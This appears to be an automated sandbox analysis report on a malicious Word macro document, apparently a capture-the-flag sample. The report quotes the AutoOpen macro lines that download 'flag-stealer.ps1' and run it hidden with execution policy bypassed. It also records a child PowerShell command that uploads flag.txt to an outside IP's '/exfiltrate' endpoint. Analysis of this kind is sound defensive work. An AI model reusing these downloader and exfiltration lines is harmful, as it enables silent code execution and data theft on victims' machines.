Source: ~WRD0000.tmp.0.dr	OLE, VBA macro line: JbxHook_Run_3__ob = jbxthis.Run(jbxparam0, jbxparam1, jbxparam2)

Document contains an embedded VBA macro with suspicious strings

Source: mal_temp.dotm.doc	OLE, VBA macro line: strFilePath = Environ("TEMP") & "\downloaded_script.ps1"
Source: mal_temp.dotm.doc	OLE, VBA macro line: Set objFile = objFileSystem.CreateTextFile(strFilePath, True)
Source: mal_temp.dotm.doc	OLE, VBA macro line: ' Run the PowerShell script silently
Source: mal_temp.dotm.doc	OLE, VBA macro line: Set objShell = CreateObject("WScript.Shell")
Source: mal_temp.dotm.doc	OLE, VBA macro line: objShell.Run "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File """ & strFilePath & """", 0, False
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function AutoOpen, String environ: strFilePath = Environ("TEMP") & "\downloaded_script.ps1"	Name: AutoOpen
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function AutoOpen, String createtextfile: Set objFile = objFileSystem.CreateTextFile(strFilePath, True)	Name: AutoOpen
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function AutoOpen, String wscript: Set objShell = CreateObject("WScript.Shell")	Name: AutoOpen
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function AutoOpen, String powershell: objShell.Run "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File """ & strFilePath & """", 0, False	Name: AutoOpen

Document contains an embedded VBA with functions possibly related to HTTP operations

Source: mal_temp.dotm.doc	Stream path 'VBA/ThisDocument' : found possibly 'XMLHttpRequest' functions response, responsetext, status, open, send
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function AutoOpen, found possibly 'XMLHttpRequest' functions response, responsetext, status, open, send	Name: AutoOpen
Source: ~WRD0000.tmp.0.dr	Stream path 'VBA/ThisDocument' : found possibly 'XMLHttpRequest' functions response, responsetext, status, open, send

Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)

Source: mal_temp.dotm.doc	Stream path 'VBA/ThisDocument' : found possibly 'WScript.Shell' functions exec, run, environ
Source: ~WRD0000.tmp.0.dr	Stream path 'VBA/ThisDocument' : found possibly 'WScript.Shell' functions exec, run, environ

Microsoft Office drops suspicious files

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\downloaded_script.ps1

Jump to behavior

Office process queries suspicious COM object (likely to drop second stage)

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\InProcServer32

Jump to behavior

Source: mal_temp.dotm.doc	OLE, VBA macro line: Sub AutoOpen()
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function AutoOpen	Name: AutoOpen
Source: ~WRD0000.tmp.0.dr	OLE, VBA macro line: Private Function JbxHook_Open_3__ob(jbxline, ByRef jbxthis, ByRef jbxparam0, ByRef jbxparam1, ByRef jbxparam2)
Source: ~WRD0000.tmp.0.dr	OLE, VBA macro line: Static jbxtresh_Open As Integer
Source: ~WRD0000.tmp.0.dr	OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~WRD0000.tmp.0.dr	OLE, VBA macro line: JbxHook_Open_3__ob = jbxthis.Open(jbxparam0, jbxparam1, jbxparam2)
Source: ~WRD0000.tmp.0.dr	OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~WRD0000.tmp.0.dr	OLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
Source: ~WRD0000.tmp.0.dr	OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_3__ob
Source: ~WRD0000.tmp.0.dr	OLE, VBA macro line: Sub AutoOpen()
Source: ~WRD0000.tmp.0.dr	OLE, VBA macro line: JbxHook_Open_3__ob 23, objXMLHttp, "GET", strUrl, False

Source: mal_temp.dotm.doc	OLE indicator, VBA macros: true
Source: ~WRD0000.tmp.0.dr	OLE indicator, VBA macros: true

Source: mal_temp.dotm.doc	Stream path 'VBA/__SRP_0' : http://127.0.0.1:8000/download/ps1TEMTVBE7.DLLA1.a,\downloaded_script.ps1SaveToFileMSXML2.XMLHTTRq"hGETOpenSendStatusADODB.StreamTyperesponseBodyWrite"CloseWScript.Shell$powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File "Run"aZ00:00:1<.a&m!00:00:05V2SrZ<Download failed. HTTP Status:.S(~4Scripting.FileSystemObjectCreateTextFileresponseText\powershell.exe -ExecutionPolicy Bypass -File "^npowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command Start-Process -NoNewWindow -FilePath 'powershell' -ArgumentList '-ExecutionPolicy Bypass -WindowStyle Hidden -File(' -Verb RunAskzpowershell.exe -ExecutionPolicy Unrestricted -WindowStyle Hidden -Command Start-Process -NoNewWindow -FilePath 'powershell' -ArgumentList '-ExecutionPolicy Bypass -WindowStyl
Source: ~WRD0000.tmp.0.dr	Stream path 'VBA/__SRP_0' : https://free-games-ua.s3.eu-central-1.amazonaws.com/flag-stealer.ps1TEM],\downloaded_script.ps1MSXML2.XMLHTTSGETSendStatus:/4Scripting.FileSystemObjectCloseWScript.Shellab64#powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File ""00:00:05<Download failed. HTTP Status:-S"!VAWriteLinecreateElementRQfIx8<param::type::value:String()-Obin.base64dataTypenodeTypedValueText"BS

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOC@8/14@1/2

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Users\user\Desktop\~WRD0000.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7364:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7932:120:WilError_03

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\{49F77492-3A3C-4AA0-A080-61B3ADDA3D8C} - OProcSessId.dat

Jump to behavior

Source: mal_temp.dotm.doc	OLE indicator, Word Document stream: true
Source: ~WRD0000.tmp.0.dr	OLE indicator, Word Document stream: true

Source: mal_temp.dotm.doc	OLE document summary: title field not present or empty
Source: ~WRD0000.tmp.0.dr	OLE document summary: title field not present or empty

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: mal_temp.dotm.doc	Virustotal: Detection: 56%
Source: mal_temp.dotm.doc	ReversingLabs: Detection: 47%

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\downloaded_script.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\upload_script.ps1" "C:\Users\user\AppData\Local\Temp\flag.txt" "http://18.157.68.73:11858/exfiltrate"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\downloaded_script.ps1"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\upload_script.ps1" "C:\Users\user\AppData\Local\Temp\flag.txt" "http://18.157.68.73:11858/exfiltrate"	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Jump to behavior

Source: mal_temp.dotm.doc

Initial sample: OLE summary template = mal_temp.dotm

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5; source: powershell.exe, 0000000F.00000002.2598670891.0000000003218000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.2609359619.00000000076B1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdb source: powershell.exe, 0000000F.00000002.2613605335.00000000085FA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Core.pdb_ source: powershell.exe, 0000000F.00000002.2613605335.00000000085FA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: powershell.exe, 0000000F.00000002.2609359619.00000000076B1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb, source: powershell.exe, 0000000F.00000002.2598670891.00000000032B8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.2609359619.0000000007747000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Core.pdb source: powershell.exe, 0000000F.00000002.2613605335.00000000085FA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 0000000F.00000002.2598670891.000000000327A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: lambda_methodCore.pdb source: powershell.exe, 0000000F.00000002.2598670891.00000000032B8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: HPVo,C:\Windows\System.pdb source: powershell.exe, 0000000F.00000002.2613095120.00000000084C7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 0000000F.00000002.2609359619.00000000076B1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 0000000F.00000002.2609359619.0000000007714000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.2609359619.0000000007747000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdbr source: powershell.exe, 0000000F.00000002.2613605335.00000000085FA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb-2246122658-3693405117-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32ll source: powershell.exe, 0000000F.00000002.2598670891.0000000003218000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb source: powershell.exe, 0000000F.00000002.2598670891.00000000032B8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 0000000F.00000002.2609359619.00000000076B1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 0000000F.00000002.2609359619.00000000076B1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000F.00000002.2598670891.0000000003218000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.2598670891.00000000032B8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdbZG source: powershell.exe, 0000000F.00000002.2598670891.00000000032B8000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Suspicious powershell command line found

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\downloaded_script.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\upload_script.ps1" "C:\Users\user\AppData\Local\Temp\flag.txt" "http://18.157.68.73:11858/exfiltrate"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\downloaded_script.ps1"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\upload_script.ps1" "C:\Users\user\AppData\Local\Temp\flag.txt" "http://18.157.68.73:11858/exfiltrate"	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 11858
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 11858

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
